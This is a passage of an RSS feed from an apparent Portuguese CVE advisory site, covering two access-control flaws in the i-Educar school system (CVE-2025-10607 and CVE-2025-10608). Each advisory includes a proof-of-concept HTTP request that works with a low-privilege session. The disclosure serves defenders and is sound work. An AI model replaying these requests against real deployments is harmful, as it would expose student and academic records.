&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint &amp;lt;code&amp;gt;/module/Avaliacao/diarioApi&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa falha permite que um usuário sem as devidas permissões consulte o endpoint e recupere ** informações da turma** manipulando parâmetros de solicitação.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Embora essa vulnerabilidade não exponha diretamente dados individuais de alunos, ela ainda constitui uma &amp;lt;b&amp;gt;divulgação não autorizada de informações de estrutura acadêmica&amp;lt;/b&amp;gt;, que pode ser aproveitada para enumeração ou como um trampolim para ataques futuros.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /module/Avaliacao/diarioApi&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue aplicar a &amp;lt;b&amp;gt;autorização em nível de objeto&amp;lt;/b&amp;gt; ao manipular este endpoint. Como resultado, qualquer usuário autenticado pode manipular os valores da solicitação para acessar informações confidenciais (nomes, IDs, status de matrícula) dos alunos.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Comportamento esperado:&amp;lt;/b&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Somente funções autorizadas (por exemplo, administradores, coordenadores, professores vinculados à turma) devem ter acesso a esses dados.&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Usuários não autorizados devem receber a mensagem 403 &amp;#34;Proibido&amp;#34; ou uma resposta vazia.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Comportamento observado:&amp;lt;/br&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Qualquer usuário autenticado (mesmo contas com privilégios baixos) pode acessar este endpoint e recuperar informações confidenciais sobre turmas acadêmicas.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Autentique como um usuário sem privilégios (por exemplo, aluno, professor).&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10607/image.png&amp;#34;
	width=&amp;#34;1439&amp;#34;
	height=&amp;#34;663&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10607/image_hu_25c2d9e3f461d49e.png 480w, /p/cve-2025-10607/image_hu_ecdded4f672254a7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;217&amp;#34;
		data-flex-basis=&amp;#34;520px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10607/image-1.png&amp;#34;
	width=&amp;#34;846&amp;#34;
	height=&amp;#34;616&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10607/image-1_hu_29ac0d2382b460d0.png 480w, /p/cve-2025-10607/image-1_hu_5d2f89eaf0785474.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;137&amp;#34;
		data-flex-basis=&amp;#34;329px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Envie a seguinte requisição:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/Avaliacao/diarioApi?&amp;amp;amp;resource=matriculas&amp;amp;amp;oper=get&amp;amp;amp;instituicao_id=1&amp;amp;amp;escola_id=3&amp;amp;amp;curso_id=4&amp;amp;amp;serie_id=undefined&amp;amp;amp;turma_id=3&amp;amp;amp;ano_escolar=2025&amp;amp;amp;componente_curricular_id=11&amp;amp;amp;etapa=1&amp;amp;amp;matricula_id=12&amp;amp;amp;busca=S&amp;amp;amp;mostrar_botao_replicar_todos=1&amp;amp;amp;ano=2025&amp;amp;amp;ref_cod_instituicao=1&amp;amp;amp;ref_cod_escola=3&amp;amp;amp;ref_cod_curso=4&amp;amp;amp;ref_cod_serie=6&amp;amp;amp;ref_cod_turma=3&amp;amp;amp;etapa=1&amp;amp;amp;ref_cod_componente_curricular=11&amp;amp;amp;ref_cod_matricula=12&amp;amp;amp;navegacao_tab=2 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: application/json, text/javascript, */*; q=0.01
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/module/Avaliacao/diario?&amp;amp;amp;resource=matriculas&amp;amp;amp;oper=get&amp;amp;amp;instituicao_id=1&amp;amp;amp;escola_id=3&amp;amp;amp;curso_id=4&amp;amp;amp;serie_id=undefined&amp;amp;amp;turma_id=3&amp;amp;amp;ano_escolar=2025&amp;amp;amp;componente_curricular_id=11&amp;amp;amp;etapa=1&amp;amp;amp;matricula_id=12
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: educar_session=[low-privileged-session]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10607/image-2.png&amp;#34;
	width=&amp;#34;1437&amp;#34;
	height=&amp;#34;673&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10607/image-2_hu_b84de71ce4393634.png 480w, /p/cve-2025-10607/image-2_hu_47595ad6e39df54f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;213&amp;#34;
		data-flex-basis=&amp;#34;512px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Pudemos observar que informações sobre classes foram retornadas.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Esta vulnerabilidade é um problema de Broken Object Level Authorization (BOLA) (OWASP API Top 10 - 2023, A01), permitindo a exposição de dados sensíveis. Qualquer usuário autenticado pode acessar informações pessoais de outros usuários. Isso pode levar a:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a PII sensíveis;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Violação das leis de proteção de dados (por exemplo, LGPD, GDPR);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Possível abuso de dados do usuário ou personificação;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Enumeração de usuários.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10607.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10607.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 17 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10608</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10608/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10608/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10608-controle-de-acesso-quebrado-no-endpoint-enrollment-historyid&amp;#34;&amp;gt;CVE-2025-10608: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/enrollment-history/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10608&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10608&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/enrollment-history/[ID]&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /enrollment-history/[ID]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10608-controle-de-acesso-quebrado-no-endpoint-enrollment-historyid&amp;#34;&amp;gt;CVE-2025-10608: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/enrollment-history/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10608&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10608&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/enrollment-history/[ID]&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /enrollment-history/[ID]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Autenticar como um usuário sem privilégios.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10608/image.png&amp;#34;
	width=&amp;#34;1439&amp;#34;
	height=&amp;#34;663&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10608/image_hu_25c2d9e3f461d49e.png 480w, /p/cve-2025-10608/image_hu_ecdded4f672254a7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;217&amp;#34;
		data-flex-basis=&amp;#34;520px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10608/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10608/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10608/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Enviar a seguinte solicitação:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /enrollment-history/206 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/intranet/educar_matricula_det.php?cod_matricula=206
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=[low_privileged cookie]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Podemos observar que temos acesso à página e à função de cadastrar alunos nas turmas. E este usuário não deveria fazer isso.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10608/image-2.png&amp;#34;
	width=&amp;#34;1617&amp;#34;
	height=&amp;#34;702&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10608/image-2_hu_2bddda474495b951.png 480w, /p/cve-2025-10608/image-2_hu_ff39a09242bf73ba.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;230&amp;#34;
		data-flex-basis=&amp;#34;552px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a funcionalidades restritas;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalonamento de privilégios para usuários de baixo nível;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Exposição de dados sensíveis e potencial comprometimento do sistema;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda de confidencialidade e integridade de registros educacionais;&amp;lt;/li&amp;gt;
